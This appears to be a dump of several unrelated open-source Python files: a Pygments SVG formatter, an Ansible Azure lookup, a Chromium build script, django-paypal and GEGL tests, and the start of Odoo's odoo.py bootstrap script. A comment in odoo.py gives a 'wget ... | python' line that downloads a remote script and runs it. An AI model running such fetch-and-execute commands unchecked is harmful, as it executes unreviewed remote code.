in pixels, or ``20`` else. (This is necessary since text coordinates
refer to the text baseline, not the top edge.)
`ystep`
Offset to add to the Y coordinate for each subsequent line. This should
roughly be the text size plus 5. It defaults to that value if the text
size is given in pixels, or ``25`` else.
`spacehack`
Convert spaces in the source to ``&#160;``, which are non-breaking
spaces. SVG provides the ``xml:space`` attribute to control how
whitespace inside tags is handled, in theory, the ``preserve`` value
could be used to keep all whitespace as-is. However, many current SVG
viewers don't obey that rule, so this option is provided as a workaround
and defaults to ``True``.
"""
name = 'SVG'
aliases = ['svg']
filenames = ['*.svg']
def __init__(self, **options):
# XXX outencoding
Formatter.__init__(self, **options)
self.nowrap = get_bool_opt(options, 'nowrap', False)
self.fontfamily = options.get('fontfamily', 'monospace')
self.fontsize = options.get('fontsize', '14px')
self.xoffset = get_int_opt(options, 'xoffset', 0)
fs = self.fontsize.strip()
if fs.endswith('px'): fs = fs[:-2].strip()
try:
int_fs = int(fs)
except:
int_fs = 20
self.yoffset = get_int_opt(options, 'yoffset', int_fs)
self.ystep = get_int_opt(options, 'ystep', int_fs + 5)
self.spacehack = get_bool_opt(options, 'spacehack', True)
self._stylecache = {}
def format_unencoded(self, tokensource, outfile):
"""
Format ``tokensource``, an iterable of ``(tokentype, tokenstring)``
tuples and write it into ``outfile``.
For our implementation we put all lines in their own 'line group'.
"""
x = self.xoffset
y = self.yoffset
if not self.nowrap:
if self.encoding:
outfile.write('<?xml version="1.0" encoding="%s"?>\n' %
self.encoding)
else:
outfile.write('<?xml version="1.0"?>\n')
outfile.write('<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.0//EN" '
'"http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/'
'svg10.dtd">\n')
outfile.write('<svg xmlns="http://www.w3.org/2000/svg">\n')
outfile.write('<g font-family="%s" font-size="%s">\n' %
(self.fontfamily, self.fontsize))
outfile.write('<text x="%s" y="%s" xml:space="preserve">' % (x, y))
for ttype, value in tokensource:
style = self._get_style(ttype)
tspan = style and '<tspan' + style + '>' or ''
tspanend = tspan and '</tspan>' or ''
value = escape_html(value)
if self.spacehack:
value = value.expandtabs().replace(' ', '&#160;')
parts = value.split('\n')
for part in parts[:-1]:
outfile.write(tspan + part + tspanend)
y += self.ystep
outfile.write('</text>\n<text x="%s" y="%s" '
'xml:space="preserve">' % (x, y))
outfile.write(tspan + parts[-1] + tspanend)
outfile.write('</text>')
if not self.nowrap:
outfile.write('</g></svg>\n')
def _get_style(self, tokentype):
if tokentype in self._stylecache:
return self._stylecache[tokentype]
otokentype = tokentype
while not self.style.styles_token(tokentype):
tokentype = tokentype.parent
value = self.style.style_for_token(tokentype)
result = ''
if value['color']:
result = ' fill="#' + value['color'] + '"'
if value['bold']:
result += ' font-weight="bold"'
if value['italic']:
result += ' font-style="italic"'
self._stylecache[otokentype] = result
return result
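# --- Illustrative usage sketch (not part of the original module) ---
# A minimal example of driving SvgFormatter through pygments.highlight(); the
# sample source string, lexer choice and output file name are assumptions made
# purely for illustration.
if __name__ == '__main__':
    from pygments import highlight
    from pygments.lexers import PythonLexer
    # Render a tiny snippet to an SVG document string and save it to disk.
    svg_doc = highlight("print 'hello'", PythonLexer(), SvgFormatter(fontsize='16px'))
    with open('example.svg', 'w') as f:
        f.write(svg_doc)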
|
mit
|
onitake/ansible
|
test/integration/targets/azure_rm_keyvault/lookup_plugins/azure_service_principal_attribute.py
|
84
|
3519
|
# (c) 2018 Yunge Zhu, <[email protected]>
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = """
lookup: azure_service_principal_attribute
requirements:
- azure-graphrbac
author:
- Yunge Zhu <[email protected]>
version_added: "2.7"
short_description: Look up Azure service principal attributes.
description:
- Describes object id of your Azure service principal account.
options:
azure_client_id:
description: azure service principal client id.
azure_secret:
description: azure service principal secret
azure_tenant:
description: azure tenant
azure_cloud_environment:
description: azure cloud environment
"""
EXAMPLES = """
set_fact:
object_id: "{{ lookup('azure_service_principal_attribute',
azure_client_id=azure_client_id,
azure_secret=azure_secret,
azure_tenant=azure_tenant) }}"
"""
RETURN = """
_raw:
description:
Returns object id of service principal.
"""
from ansible.errors import AnsibleError
from ansible.plugins import AnsiblePlugin
from ansible.plugins.lookup import LookupBase
from ansible.module_utils._text import to_native
try:
from azure.common.credentials import ServicePrincipalCredentials
from azure.graphrbac import GraphRbacManagementClient
from msrestazure import azure_cloud
from msrestazure.azure_exceptions import CloudError
except ImportError:
raise AnsibleError(
"The lookup azure_service_principal_attribute requires azure.graphrbac, msrest")
class LookupModule(LookupBase):
def run(self, terms, variables, **kwargs):
self.set_options(direct=kwargs)
credentials = {}
credentials['azure_client_id'] = self.get_option('azure_client_id', None)
credentials['azure_secret'] = self.get_option('azure_secret', None)
credentials['azure_tenant'] = self.get_option('azure_tenant', 'common')
if credentials['azure_client_id'] is None or credentials['azure_secret'] is None:
raise AnsibleError("Must specify azure_client_id and azure_secret")
_cloud_environment = azure_cloud.AZURE_PUBLIC_CLOUD
if self.get_option('azure_cloud_environment', None) is not None:
_cloud_environment = azure_cloud.get_cloud_from_metadata_endpoint(self.get_option('azure_cloud_environment'))
try:
azure_credentials = ServicePrincipalCredentials(client_id=credentials['azure_client_id'],
secret=credentials['azure_secret'],
tenant=credentials['azure_tenant'],
resource=_cloud_environment.endpoints.active_directory_graph_resource_id)
client = GraphRbacManagementClient(azure_credentials, credentials['azure_tenant'],
base_url=_cloud_environment.endpoints.active_directory_graph_resource_id)
response = list(client.service_principals.list(filter="appId eq '{0}'".format(credentials['azure_client_id'])))
sp = response[0]
return sp.object_id.split(',')
except CloudError as ex:
raise AnsibleError("Failed to get service principal object id: %s" % to_native(ex))
return False
|
gpl-3.0
|
Teamxrtc/webrtc-streaming-node
|
third_party/webrtc/src/chromium/src/build/android/gyp/pack_relocations.py
|
34
|
3683
|
#!/usr/bin/env python
#
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Pack relocations in a library (or copy unchanged).
If --enable-packing and --configuration-name=='Release', invoke the
relocation_packer tool to pack the .rel.dyn or .rela.dyn section in the given
library files. This step is inserted after the libraries are stripped.
If --enable-packing is zero, the script copies files verbatim, with no
attempt to pack relocations.
Any library listed in --exclude-packing-list is also copied verbatim,
irrespective of any --enable-packing setting. Typically this would be
'libchromium_android_linker.so'.
"""
import optparse
import os
import shlex
import shutil
import sys
import tempfile
from util import build_utils
def PackLibraryRelocations(android_pack_relocations, library_path, output_path):
shutil.copy(library_path, output_path)
pack_command = [android_pack_relocations, output_path]
build_utils.CheckOutput(pack_command)
def CopyLibraryUnchanged(library_path, output_path):
shutil.copy(library_path, output_path)
def main(args):
args = build_utils.ExpandFileArgs(args)
parser = optparse.OptionParser()
build_utils.AddDepfileOption(parser)
parser.add_option('--clear-dir', action='store_true',
help='If set, the destination directory will be deleted '
'before copying files to it. This is highly recommended to '
'ensure that no stale files are left in the directory.')
parser.add_option('--configuration-name',
default='Release',
help='Gyp configuration name (i.e. Debug, Release)')
parser.add_option('--enable-packing',
choices=['0', '1'],
help=('Pack relocations if 1 and configuration name is \'Release\','
' otherwise plain file copy'))
parser.add_option('--exclude-packing-list',
default='',
help='Names of any libraries explicitly not packed')
parser.add_option('--android-pack-relocations',
help='Path to the relocations packer binary')
parser.add_option('--stripped-libraries-dir',
help='Directory for stripped libraries')
parser.add_option('--packed-libraries-dir',
help='Directory for packed libraries')
parser.add_option('--libraries', action='append',
help='List of libraries')
parser.add_option('--stamp', help='Path to touch on success')
options, _ = parser.parse_args(args)
enable_packing = (options.enable_packing == '1' and
options.configuration_name == 'Release')
exclude_packing_set = set(shlex.split(options.exclude_packing_list))
libraries = []
for libs_arg in options.libraries:
libraries += build_utils.ParseGypList(libs_arg)
if options.clear_dir:
build_utils.DeleteDirectory(options.packed_libraries_dir)
build_utils.MakeDirectory(options.packed_libraries_dir)
for library in libraries:
library_path = os.path.join(options.stripped_libraries_dir, library)
output_path = os.path.join(
options.packed_libraries_dir, os.path.basename(library))
if enable_packing and library not in exclude_packing_set:
PackLibraryRelocations(options.android_pack_relocations,
library_path,
output_path)
else:
CopyLibraryUnchanged(library_path, output_path)
if options.depfile:
build_utils.WriteDepfile(
options.depfile,
libraries + build_utils.GetPythonDependencies())
if options.stamp:
build_utils.Touch(options.stamp)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
mit
|
Azure/azure-sdk-for-python
|
sdk/synapse/azure-synapse/azure/synapse/accesscontrol/aio/_access_control_client_async.py
|
1
|
2504
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, TYPE_CHECKING
from azure.core import AsyncPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration_async import AccessControlClientConfiguration
from .operations_async import AccessControlOperations
from .. import models
class AccessControlClient(object):
"""AccessControlClient.
:ivar access_control: AccessControlOperations operations
:vartype access_control: azure.synapse.accesscontrol.aio.operations_async.AccessControlOperations
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param endpoint: The workspace development endpoint, for example https://myworkspace.dev.azuresynapse.net.
:type endpoint: str
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
"""
def __init__(
self,
credential: "AsyncTokenCredential",
endpoint: str,
**kwargs: Any
) -> None:
base_url = '{endpoint}'
self._config = AccessControlClientConfiguration(credential, endpoint, **kwargs)
self._client = AsyncPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
self.access_control = AccessControlOperations(
self._client, self._config, self._serialize, self._deserialize)
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> "AccessControlClient":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details)
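# --- Illustrative usage sketch (not part of the generated code) ---
# A minimal async example, assuming azure-identity's DefaultAzureCredential and a
# hypothetical workspace endpoint; the concrete operation call is elided because it
# depends on the AccessControlOperations surface.
#
#   import asyncio
#   from azure.identity.aio import DefaultAzureCredential
#
#   async def main():
#       async with AccessControlClient(DefaultAzureCredential(),
#                                      "https://myworkspace.dev.azuresynapse.net") as client:
#           ...  # call methods on client.access_control here
#
#   asyncio.run(main())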
|
mit
|
GamesDoneQuick/django-paypal
|
paypal/pro/tests/test_pro.py
|
1
|
12369
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from decimal import Decimal
import mock
from django.contrib.auth import get_user_model
from django.forms import ValidationError
from django.test import TestCase
from django.test.client import RequestFactory
from django.test.utils import override_settings
from vcr import VCR
from paypal.pro.exceptions import PayPalFailure
from paypal.pro.fields import CreditCardField
from paypal.pro.helpers import VERSION, PayPalError, PayPalWPP, strip_ip_port
from paypal.pro.views import PayPalPro
from .settings import TEMPLATES
RF = RequestFactory()
vcr = VCR(path_transformer=VCR.ensure_suffix('.yaml'))
def make_request(user=None):
request = RF.get("/pay/", REMOTE_ADDR="127.0.0.1:8000")
if user is not None:
request.user = user
return request
class CreditCardFieldTest(TestCase):
def test_CreditCardField(self):
field = CreditCardField()
field.clean('4797503429879309')
self.assertEqual(field.card_type, "Visa")
self.assertRaises(ValidationError, CreditCardField().clean, '1234567890123455')
def test_invalidCreditCards(self):
self.assertEqual(CreditCardField().clean('4797-5034-2987-9309'), '4797503429879309')
def ppp_wrapper(request, handler=None):
item = {"paymentrequest_0_amt": "10.00",
"inv": "inventory",
"custom": "tracking",
"cancelurl": "http://foo.com/cancel",
"returnurl": "http://foo.com/return"}
if handler is None:
handler = lambda nvp: nvp # NOP
ppp = PayPalPro(
item=item, # what you're selling
payment_template="payment.html", # template name for payment
confirm_template="confirmation.html", # template name for confirmation
success_url="/success/", # redirect location after success
nvp_handler=handler
)
return ppp(request)
@override_settings(TEMPLATES=TEMPLATES)
class PayPalProTest(TestCase):
@vcr.use_cassette()
def test_get(self):
response = ppp_wrapper(RF.get('/'))
self.assertContains(response, 'Show me the money')
self.assertEqual(response.status_code, 200)
@vcr.use_cassette()
def test_get_redirect(self):
response = ppp_wrapper(RF.get('/', {'express': '1'}))
self.assertEqual(response.status_code, 302)
@vcr.use_cassette()
def test_validate_confirm_form_error(self):
response = ppp_wrapper(RF.post('/',
{'token': '123',
'PayerID': '456'}))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context_data.get('errors', ''),
PayPalPro.errors['processing'])
@vcr.use_cassette()
@mock.patch.object(PayPalWPP, 'doExpressCheckoutPayment', autospec=True)
def test_validate_confirm_form_ok(self, doExpressCheckoutPayment):
nvp = {'mock': True}
doExpressCheckoutPayment.return_value = nvp
received = []
def handler(nvp):
received.append(nvp)
response = ppp_wrapper(RF.post('/',
{'token': '123',
'PayerID': '456'}),
handler=handler)
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Location'], '/success/')
self.assertEqual(len(received), 1)
class PayPalWPPTest(TestCase):
def setUp(self):
self.item = {
'amt': '9.95',
'inv': 'inv',
'custom': 'custom',
'next': 'http://www.example.com/next/',
'returnurl': 'http://www.example.com/pay/',
'cancelurl': 'http://www.example.com/cancel/'
}
# Handle different parameters for Express Checkout
self.ec_item = {
'paymentrequest_0_amt': '9.95',
'inv': 'inv',
'custom': 'custom',
'next': 'http://www.example.com/next/',
'returnurl': 'http://www.example.com/pay/',
'cancelurl': 'http://www.example.com/cancel/'
}
def get_valid_doDirectPayment_data(self):
return {
'firstname': 'Brave',
'lastname': 'Star',
'street': '1 Main St',
'city': u'San Jos\xe9',
'state': 'CA',
'countrycode': 'US',
'zip': '95131',
'acct': '4032039938039650',
'expdate': '112021',
'cvv2': '',
'creditcardtype': 'visa',
'ipaddress': '10.0.1.199',
}
@vcr.use_cassette()
def test_doDirectPayment_missing_params(self):
wpp = PayPalWPP(make_request())
data = {'firstname': 'Chewbacca'}
self.assertRaises(PayPalError, wpp.doDirectPayment, data)
@vcr.use_cassette()
def test_doDirectPayment_valid(self):
wpp = PayPalWPP(make_request())
data = self.get_valid_doDirectPayment_data()
data.update(self.item)
nvp = wpp.doDirectPayment(data)
self.assertIsNotNone(nvp)
for k, v in [('avscode', 'X'),
('amt', '9.95'),
('correlationid', '1025431f33d89'),
('currencycode', 'USD'),
('ack', 'Success')]:
self.assertEqual(nvp.response_dict[k], v)
@vcr.use_cassette()
def test_doDirectPayment_authenticated_user(self):
User = get_user_model()
user = User.objects.create(username='testuser')
wpp = PayPalWPP(make_request(user=user))
data = self.get_valid_doDirectPayment_data()
data.update(self.item)
npm_obj = wpp.doDirectPayment(data)
self.assertEqual(npm_obj.user, user)
@vcr.use_cassette()
def test_doDirectPayment_invalid(self):
wpp = PayPalWPP(make_request())
data = {
'firstname': 'Epic',
'lastname': 'Fail',
'street': '100 Georgia St',
'city': 'Vancouver',
'state': 'BC',
'countrycode': 'CA',
'zip': 'V6V 1V1',
'expdate': '012019',
'cvv2': '999',
'acct': '1234567890',
'creditcardtype': 'visa',
'ipaddress': '10.0.1.199', }
data.update(self.item)
self.assertRaises(PayPalFailure, wpp.doDirectPayment, data)
@vcr.use_cassette()
def test_setExpressCheckout(self):
wpp = PayPalWPP(make_request())
nvp_obj = wpp.setExpressCheckout(self.ec_item)
self.assertEqual(nvp_obj.ack, "Success")
@vcr.use_cassette()
@mock.patch.object(PayPalWPP, '_request', autospec=True)
def test_doExpressCheckoutPayment(self, mock_request_object):
ec_token = 'EC-1234567890'
payerid = 'LXYZABC1234'
item = self.ec_item.copy()
item.update({'token': ec_token, 'payerid': payerid})
mock_request_object.return_value = 'ack=Success&token=%s&version=%s&paymentinfo_0_amt=%s' % \
(ec_token, VERSION, self.ec_item['paymentrequest_0_amt'])
wpp = PayPalWPP(make_request())
wpp.doExpressCheckoutPayment(item)
call_args = mock_request_object.call_args
self.assertIn('VERSION=%s' % VERSION, call_args[0][1])
self.assertIn('METHOD=DoExpressCheckoutPayment', call_args[0][1])
self.assertIn('TOKEN=%s' % ec_token, call_args[0][1])
self.assertIn('PAYMENTREQUEST_0_AMT=%s' % item['paymentrequest_0_amt'],
call_args[0][1])
self.assertIn('PAYERID=%s' % payerid, call_args[0][1])
@vcr.use_cassette()
@mock.patch.object(PayPalWPP, '_request', autospec=True)
def test_doExpressCheckoutPayment_invalid(self, mock_request_object):
ec_token = 'EC-1234567890'
payerid = 'LXYZABC1234'
item = self.ec_item.copy()
item.update({'token': ec_token, 'payerid': payerid})
mock_request_object.return_value = 'ack=Failure&l_errorcode=42&l_longmessage0=Broken'
wpp = PayPalWPP(make_request())
with self.assertRaises(PayPalFailure):
wpp.doExpressCheckoutPayment(item)
@vcr.use_cassette()
@mock.patch.object(PayPalWPP, '_request', autospec=True)
def test_createBillingAgreement(self, mock_request_object):
mock_request_object.return_value = 'ack=Success&billingagreementid=B-XXXXX&version=%s' % VERSION
wpp = PayPalWPP(make_request())
nvp = wpp.createBillingAgreement({'token': 'dummy token'})
call_args = mock_request_object.call_args
self.assertIn('VERSION=%s' % VERSION, call_args[0][1])
self.assertIn('METHOD=CreateBillingAgreement', call_args[0][1])
self.assertIn('TOKEN=dummy+token', call_args[0][1])
self.assertEqual(nvp.method, 'CreateBillingAgreement')
self.assertEqual(nvp.ack, 'Success')
mock_request_object.return_value = 'ack=Failure&l_errorcode=42&l_longmessage0=Broken'
with self.assertRaises(PayPalFailure):
nvp = wpp.createBillingAgreement({'token': 'dummy token'})
@vcr.use_cassette()
@mock.patch.object(PayPalWPP, '_request', autospec=True)
def test_doReferenceTransaction_valid(self, mock_request_object):
reference_id = 'B-1234'
amount = Decimal('10.50')
mock_request_object.return_value = (
'ack=Success&paymentstatus=Completed&amt=%s&version=%s&billingagreementid=%s' %
(amount, VERSION, reference_id))
wpp = PayPalWPP(make_request())
nvp = wpp.doReferenceTransaction({'referenceid': reference_id,
'amt': amount})
call_args = mock_request_object.call_args
self.assertIn('VERSION=%s' % VERSION, call_args[0][1])
self.assertIn('METHOD=DoReferenceTransaction', call_args[0][1])
self.assertIn('REFERENCEID=%s' % reference_id, call_args[0][1])
self.assertIn('AMT=%s' % amount, call_args[0][1])
self.assertEqual(nvp.method, 'DoReferenceTransaction')
self.assertEqual(nvp.ack, 'Success')
@vcr.use_cassette()
@mock.patch.object(PayPalWPP, '_request', autospec=True)
def test_doReferenceTransaction_invalid(self, mock_request_object):
reference_id = 'B-1234'
amount = Decimal('10.50')
mock_request_object.return_value = 'ack=Failure&l_errorcode=42&l_longmessage0=Broken'
wpp = PayPalWPP(make_request())
with self.assertRaises(PayPalFailure):
wpp.doReferenceTransaction({'referenceid': reference_id,
'amt': amount})
def test_strip_ip_port(self):
IPv4 = '192.168.0.1'
IPv6 = '2001:0db8:85a3:0000:0000:8a2e:0370:7334'
PORT = '8000'
# IPv4 with port
test = '%s:%s' % (IPv4, PORT)
self.assertEqual(IPv4, strip_ip_port(test))
# IPv4 without port
test = IPv4
self.assertEqual(IPv4, strip_ip_port(test))
# IPv6 with port
test = '[%s]:%s' % (IPv6, PORT)
self.assertEqual(IPv6, strip_ip_port(test))
# IPv6 without port
test = IPv6
self.assertEqual(IPv6, strip_ip_port(test))
# No IP
self.assertEqual('', strip_ip_port(''))
# -- DoExpressCheckoutPayment
# PayPal Request:
# {'amt': '10.00',
# 'cancelurl': u'http://xxx.xxx.xxx.xxx/deploy/480/upgrade/?upgrade=cname',
# 'custom': u'website_id=480&cname=1',
# 'inv': u'website-480-cname',
# 'method': 'DoExpressCheckoutPayment',
# 'next': u'http://xxx.xxx.xxx.xxx/deploy/480/upgrade/?upgrade=cname',
# 'payerid': u'BN5JZ2V7MLEV4',
# 'paymentaction': 'Sale',
# 'returnurl': u'http://xxx.xxx.xxx.xxx/deploy/480/upgrade/?upgrade=cname',
# 'token': u'EC-6HW17184NE0084127'}
#
# PayPal Response:
# {'ack': 'Success',
# 'amt': '10.00',
# 'build': '848077',
# 'correlationid': '375f4773c3d34',
# 'currencycode': 'USD',
# 'feeamt': '0.59',
# 'ordertime': '2009-03-04T20:56:08Z',
# 'paymentstatus': 'Completed',
# 'paymenttype': 'instant',
# 'pendingreason': 'None',
# 'reasoncode': 'None',
# 'taxamt': '0.00',
# 'timestamp': '2009-03-04T20:56:09Z',
# 'token': 'EC-6HW17184NE0084127',
# 'transactionid': '3TG42202A7335864V',
# 'transactiontype': 'expresscheckout',
# 'version': '54.0'}
|
mit
|
OpenCL/GEGL-OpenCL-old
|
tests/python/test-gegl-color.py
|
7
|
3300
|
#!/usr/bin/env python
""" This file is part of GEGL
*
* GEGL is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 3 of the License, or (at your option) any later version.
*
* GEGL is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with GEGL; if not, see <http://www.gnu.org/licenses/>.
*
* Copyright 2013 Daniel Sabo <[email protected]>
"""
import unittest
from gi.repository import Gegl
class TestGeglColor(unittest.TestCase):
def assertAlmostEqualComps(self, a, b):
self.assertEqual(len(a), len(b))
for acomp, bcomp in zip(a, b):
self.assertAlmostEqual(acomp, bcomp)
def test_new_color(self):
Gegl.Color.new("rgba(0.6, 0.6, 0.6, 1.0)")
def test_new_color_string(self):
Gegl.Color(string="rgba(0.6, 0.6, 0.6, 1.0)")
def test_color_set_rgba(self):
c = Gegl.Color.new("rgba(1.0, 1.0, 1.0, 1.0)")
values = c.get_rgba()
self.assertAlmostEqual(values[0], 1.0)
self.assertAlmostEqual(values[1], 1.0)
self.assertAlmostEqual(values[2], 1.0)
self.assertAlmostEqual(values[3], 1.0)
c.set_rgba(0.3, 0.6, 0.9, 1.0)
values = c.get_rgba()
self.assertAlmostEqual(values[0], 0.3)
self.assertAlmostEqual(values[1], 0.6)
self.assertAlmostEqual(values[2], 0.9)
self.assertAlmostEqual(values[3], 1.0)
def test_color_get_components(self):
c = Gegl.Color()
c.set_components(Gegl.format("RGB float"), [1.0, 0.0, 0.0])
values = c.get_components(Gegl.format("RGB float"))
self.assertAlmostEqualComps(values, [1.0, 0.0, 0.0])
values = c.get_components(Gegl.format("RGBA double"))
self.assertAlmostEqualComps(values, [1.0, 0.0, 0.0, 1.0])
values = c.get_components(Gegl.format("RGBA float"))
self.assertAlmostEqualComps(values, [1.0, 0.0, 0.0, 1.0])
values = c.get_components(Gegl.format("RGBA u32"))
self.assertEqual(values, [float(0xFFFFFFFF), 0.0, 0.0, float(0xFFFFFFFF)])
values = c.get_components(Gegl.format("RGBA u16"))
self.assertEqual(values, [float(0xFFFF), 0.0, 0.0, float(0xFFFF)])
values = c.get_components(Gegl.format("RGBA u8"))
self.assertEqual(values, [float(0xFF), 0.0, 0.0, float(0xFF)])
c.set_components(Gegl.format("R'G'B' u8"), [128, 0, 128])
values = c.get_components(Gegl.format("R'G'B'A u8"))
self.assertEqual(values, [float(128), 0.0, float(128), float(255)])
c.set_components(Gegl.format("YA double"), [0.5, 0.5])
values = c.get_components(Gegl.format("RGBA double"))
self.assertAlmostEqualComps(values, [0.5, 0.5, 0.5, 0.5])
values = c.get_components(Gegl.format("RaGaBaA double"))
self.assertAlmostEqualComps(values, [0.25, 0.25, 0.25, 0.5])
if __name__ == '__main__':
Gegl.init(None);
unittest.main()
Gegl.exit()
|
lgpl-3.0
|
phoebusliang/parallel-lettuce
|
tests/integration/lib/Django-1.2.5/tests/regressiontests/views/tests/defaults.py
|
39
|
3922
|
from os import path
from django.conf import settings
from django.test import TestCase
from django.contrib.contenttypes.models import ContentType
from regressiontests.views.models import Author, Article, UrlArticle
class DefaultsTests(TestCase):
"""Test django views in django/views/defaults.py"""
fixtures = ['testdata.json']
non_existing_urls = ['/views/non_existing_url/', # this is in urls.py
'/views/other_non_existing_url/'] # this NOT in urls.py
def test_shortcut_with_absolute_url(self):
"Can view a shortcut for an Author object that has a get_absolute_url method"
for obj in Author.objects.all():
short_url = '/views/shortcut/%s/%s/' % (ContentType.objects.get_for_model(Author).id, obj.pk)
response = self.client.get(short_url)
self.assertRedirects(response, 'http://testserver%s' % obj.get_absolute_url(),
status_code=302, target_status_code=404)
def test_shortcut_no_absolute_url(self):
"Shortcuts for an object that has no get_absolute_url method raises 404"
for obj in Article.objects.all():
short_url = '/views/shortcut/%s/%s/' % (ContentType.objects.get_for_model(Article).id, obj.pk)
response = self.client.get(short_url)
self.assertEquals(response.status_code, 404)
def test_wrong_type_pk(self):
short_url = '/views/shortcut/%s/%s/' % (ContentType.objects.get_for_model(Author).id, 'nobody/expects')
response = self.client.get(short_url)
self.assertEquals(response.status_code, 404)
def test_shortcut_bad_pk(self):
short_url = '/views/shortcut/%s/%s/' % (ContentType.objects.get_for_model(Author).id, '42424242')
response = self.client.get(short_url)
self.assertEquals(response.status_code, 404)
def test_nonint_content_type(self):
an_author = Author.objects.all()[0]
short_url = '/views/shortcut/%s/%s/' % ('spam', an_author.pk)
response = self.client.get(short_url)
self.assertEquals(response.status_code, 404)
def test_bad_content_type(self):
an_author = Author.objects.all()[0]
short_url = '/views/shortcut/%s/%s/' % (42424242, an_author.pk)
response = self.client.get(short_url)
self.assertEquals(response.status_code, 404)
def test_page_not_found(self):
"A 404 status is returned by the page_not_found view"
for url in self.non_existing_urls:
response = self.client.get(url)
self.assertEquals(response.status_code, 404)
def test_csrf_token_in_404(self):
"""
The 404 page should have the csrf_token available in the context
"""
# See ticket #14565
old_DEBUG = settings.DEBUG
try:
settings.DEBUG = False # so we get real 404, not technical
for url in self.non_existing_urls:
response = self.client.get(url)
csrf_token = response.context['csrf_token']
self.assertNotEqual(str(csrf_token), 'NOTPROVIDED')
self.assertNotEqual(str(csrf_token), '')
finally:
settings.DEBUG = old_DEBUG
def test_server_error(self):
"The server_error view raises a 500 status"
response = self.client.get('/views/server_error/')
self.assertEquals(response.status_code, 500)
def test_get_absolute_url_attributes(self):
"A model can set attributes on the get_absolute_url method"
self.assertTrue(getattr(UrlArticle.get_absolute_url, 'purge', False),
'The attributes of the original get_absolute_url must be added.')
article = UrlArticle.objects.get(pk=1)
self.assertTrue(getattr(article.get_absolute_url, 'purge', False),
'The attributes of the original get_absolute_url must be added.')
|
gpl-3.0
|
Antiun/c2c-rd-addons
|
c2c_product_price_unit/__init__.py
|
4
|
1244
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
# Copyright (C) 2010-2012 ChriCar Beteiligungs- und Beratungs- GmbH (<http://www.camptocamp.at>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import purchase
import sale
import account_invoice
import stock
import hr_expense
import wizard
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
ojengwa/odoo
|
odoo.py
|
257
|
5618
|
#!/usr/bin/env python
#----------------------------------------------------------
# odoo cli
#
# To install your odoo development environment type:
#
# wget -O- https://raw.githubusercontent.com/odoo/odoo/8.0/odoo.py | python
#
# The setup_* subcommands used to bootstrap odoo are defined here inline and may
# only depend on the python 2.7 stdlib
#
# The rest of subcommands are defined in odoo/cli or in <module>/cli by
# subclassing the Command object
#
#----------------------------------------------------------
import os
import re
import sys
import subprocess
GIT_HOOKS_PRE_PUSH = """
#!/usr/bin/env python2
import re
import sys
if re.search('github.com[:/]odoo/odoo.git$', sys.argv[2]):
print "Pushing to /odoo/odoo.git is forbidden, please push to odoo-dev, use --no-verify to override"
sys.exit(1)
"""
def printf(f,*l):
print "odoo:" + f % l
def run(*l):
if isinstance(l[0], list):
l = l[0]
printf("running %s", " ".join(l))
subprocess.check_call(l)
def git_locate():
# Locate git dir
# TODO add support for os.environ.get('GIT_DIR')
# check for an odoo child
if os.path.isfile('odoo/.git/config'):
os.chdir('odoo')
path = os.getcwd()
while path != os.path.abspath(os.sep):
gitconfig_path = os.path.join(path, '.git/config')
if os.path.isfile(gitconfig_path):
release_py = os.path.join(path, 'openerp/release.py')
if os.path.isfile(release_py):
break
path = os.path.dirname(path)
if path == os.path.abspath(os.sep):
path = None
return path
def cmd_setup_git():
git_dir = git_locate()
if git_dir:
printf('git repo found at %s',git_dir)
else:
run("git", "init", "odoo")
os.chdir('odoo')
git_dir = os.getcwd()
if git_dir:
# push sane config for git < 2.0, and hooks
#run('git','config','push.default','simple')
# alias
run('git','config','alias.st','status')
# merge bzr style
run('git','config','merge.commit','no')
# pull: let me choose between merge or rebase; 'pull.ff only' needs git > 2.0, use an alias for git 1.x
run('git','config','pull.ff','only')
run('git','config','alias.pl','pull --ff-only')
pre_push_path = os.path.join(git_dir, '.git/hooks/pre-push')
